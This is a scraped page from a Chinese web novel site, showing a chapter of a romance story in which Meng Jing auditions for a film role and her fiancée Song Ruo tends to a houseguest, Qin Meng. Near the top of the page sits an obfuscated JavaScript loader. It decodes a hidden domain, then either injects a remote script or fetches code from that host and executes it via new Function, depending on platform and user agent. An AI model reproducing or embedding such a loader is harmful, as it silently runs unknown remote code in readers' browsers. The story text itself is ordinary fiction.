98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(34(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

倪俊也喜欢爽快人,十分喜悦那我就,恭敬不如从命。小咳,孟璟

旁边的李滔滔噗地一下笑喷。小孟璟是什么鬼啦。

倪俊这回选演员都是亲自下场,这本子虽说不见得格外出彩,在口碑和票房上都注定不是他最好的那一部,可这是男友的一个梦,自己身为爱人的造梦师,与有荣焉,当然是不辞辛劳的。上午来过,下午又来,倒也并不全为了应付孟璟的面子。

试戏片段和先前一样。郑遂心堵在巷子口,抓高年级男生收保护费。

小弱鸡助理再次担当那个倒霉鬼。孟璟提着他的衣领,半天没说话,根本不照剧本来,只把一双黑白分明的眼看定了滔滔的脸,看得滔滔两腿堪堪软了下去,她顺势将他往侧边一扔,脚便踏在了李滔滔的膝盖上,勾着唇角笑了出来你这个月是不是忘了啥啊?声音很平稳,没有刻意粗着嗓子,反而还有点柔柔的尾音,听了却叫人不寒而栗。

李滔滔甚至当场翻出自己的钱包要把现金给她。

倪俊在一旁起了鸡皮疙瘩,摸了一把胡子,心想幸好有这把胡子替自己做掩饰,让自己看起来没那么瞠目结舌。来之前都把拒绝孟璟的套话给准备好了,此时全部抛诸九霄云外,只感叹,这孟家大小姐,长了这么个体面模样,怎么言行举止一放开,跟个在街头混了十几年的老混子一样。

那孟璟收了姿势,一面扶倒霉助理起来,道了歉,问踢到没。

李滔滔没回答她的问题,只是两眼闪着小星星望着她。

咳咳。孟璟觉得特别羞耻,那什么,是不是太过了?

倪俊打了两个冷战,鼓起掌来,也有点不好意思演得不错啊,你不说,我还以为是学过表演的呢。就是不知道能打不能打?不能打要找武替。

孟璟笑眯眯,两只手交替掰了掰手腕,发出咔嚓咔嚓的轻微声响,要试试吗?

倪俊本能地拒绝,转口道文戏先来一段吧。

宋若休息了会儿,又把一星期的练习都写完了,下午应林尽染的邀约,去帮她挑参考资料。出得房门,见孟璟的房门敞着,东南面的小窗也开着,通着风。她也不知是什么心情,站住了,任由习习的微风吹拂在脸颊和胳膊的皮肤上,空气里有轻微的海盐味,孟璟的窗口挂着个什么饰物,叮叮当当地碰在墙上,声音很动听。她想走过去看看究竟,踟蹰了会儿,最终还是没有去,绾绾头发,扶着扶手,挎着包慢慢下楼来。

秦萌坐在沙发里,看起来安安静静的,见了她,微垂着的眼缓缓睁大,低低喊了声若若。

宋若听她声音不太对,扶着挎包带子问了一句你这是怎么了?

我,不太舒服。她声音透着股子娇弱。

宋若心想这怎么好呢,抹香鲸不在,小娇妻病了。

要去看医生吗?她走到小娇妻身边,将包取下来,伸手探探秦萌的额头。

秦萌坐住不动,一瞬不瞬地盯着她,脸颊慢慢地染红。

宋若舒口气,没发烧。

可、可是好不舒服。

小娇妻听起来真的十分难受。

宋若想了想,你去房间好好休息。

秦萌站起来,似乎要往房间去,可惜力有不逮,整个人像一片秋天的叶子瑟瑟地落进了宋若的怀里,唔,头好晕。

宋若周身僵了僵,心想要是好死不死孟璟这时候回来,看到这一幕,那鲸鱼不知什么反应。扶秦萌在沙发坐下,拍了拍她的背,安抚道你别急,孟家有家庭医生的,我请芬姨帮你叫过来。

秦萌轻轻点头嗯。见她要走,抓住她的手,若若先扶我去房间好不好?

第41章

宋若觉着尴尬。来这边以后生活太过忙碌,东奔西走,差不多忘了自己是个深柜,也有许久没再感叹过自己至死还是牡丹这回事。孟璟的小娇妻软绵绵的,扶她回房间这一路,简直惊魂一分半,尽管没有什么逾越的地方,以后抹香鲸翻起旧账来,这次和小娇妻靠这么近,搞不好也会成为一大错处。人的脑电波很神奇,它cue到某个人,这人往往就刚好来了电话,或是干脆像抹香鲸这样,真人直接从天而降。

门吱呀一声推开时,宋若和秦萌同时往门口一望。

站在门口的孟璟

宋若见了她,却吁出一口气,如释重负朝她招手,孟璟。

孟璟磨了磨牙,慢慢走过来,未婚妻不等她有什么表示,先说道秦萌不舒服,你扶她回房间吧。说着就要把人往她这边送。

秦孟二人的表情都变得有点精彩。

秦萌说了句我不要,更紧地巴住了宋若的胳膊,警惕地望着对面的孟璟。

好比过分谦虚就等于骄傲,过分表示疏远其实也是有反效果的,仿佛做贼心虚,此地无银。宋若为了表示内心的坦荡,反而不好再坚持了,对孟璟说那你叫医生来看看吧。

孟璟目送未婚妻搀着客人进了房间,额角乱跳,掏出手机来,先呼了温医生,接着拨给姑母。线路一接通,她开门见山问孟女士,您放家里的这位小客人,到底什么时候回家啊?

孟姗姗在那边哟了一声你什么时候学得这么小气?她个子那么小,饭量也不大,你干嘛急着赶人?

孟璟她要只是多吃点倒没什么。

孟姗姗笑得爽朗她怎么了?

别的不提,来我们家三天两头不舒服,敢情是孟家的风水与她不合。您还是趁早接走吧。我谢谢您。

行。

她回答得这样爽快,孟璟反而愣了一愣。

孟姗姗挂了电话,对着暗掉的手机屏幕微微一哂。这是个周日,她丈夫谢瀛昨晚轮的晚班,今天在家休息,蓬着头从卧室走出来,在她对面坐下,倒了杯水,喝了两口,问道是孟璟找你?

孟姗姗朝他看看,没回答。

谢瀛说你看,自己的客人放娘家,果然让你侄女儿烦了吧。

孟姗姗光火什么娘家婆家,都是我家,你的脑筋怎么这样旧?顿了顿,摇摇头,嘶了一声,老秦这女儿,不是说小魔女来着吗。早年她与秦父合作时,听说过这小姑娘的光辉事迹,她彼时上初中二年级,到高中部蹭课,课蹭得怎么样暂且不说,一星期内拆散了两对交往二年以上的情侣,不为别的,原因仅仅是他们吵到她听课。秦父是个女儿奴,脑回路也不同寻常,小秦干的每件事她都引以为傲,这件也不例外。

你又打她女儿什么主意?谢瀛脸上露出狐疑。

我能有什么主意?你想多了现在她老子主动和我终止合作,我和她们秦家就是单纯的友谊,连利益关系都没了。孟姗姗站起来。

宋若扶了秦萌躺下,替她盖了被子,立即就要出去。

然而床上那个红着脸喊她若若,不要走。

宋若踟蹰了下,恰好脚踝那里有毛绒绒的东西蹭了一蹭,伴随咕噜咕噜的声响。她本身极其喜欢猫,可如果倾注过多的热情,以后就会很难割舍,故而认识以来都很克制。平时这小猫的青睐总让她有点为难,今天小猫却成了她的救命稻草。扔下病人走开不太好,两两相对又难堪,这种时候,撸猫就成为了上佳的选择了。

宋若唔了一声,将猫猫抱起来,在猫背轻轻抚摸了一阵,发自心底感到致命的愉悦,咦了一声,好像饿了?说着就捧着猫喂食去了。完美避开窘迫。

猫喂到一半,果然孟璟也跟了进来,她咳嗽一声给你叫医生了。马上过来。

秦萌在床上摇了摇头,心病而已。

孟璟这个年纪,什么心病不心病。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间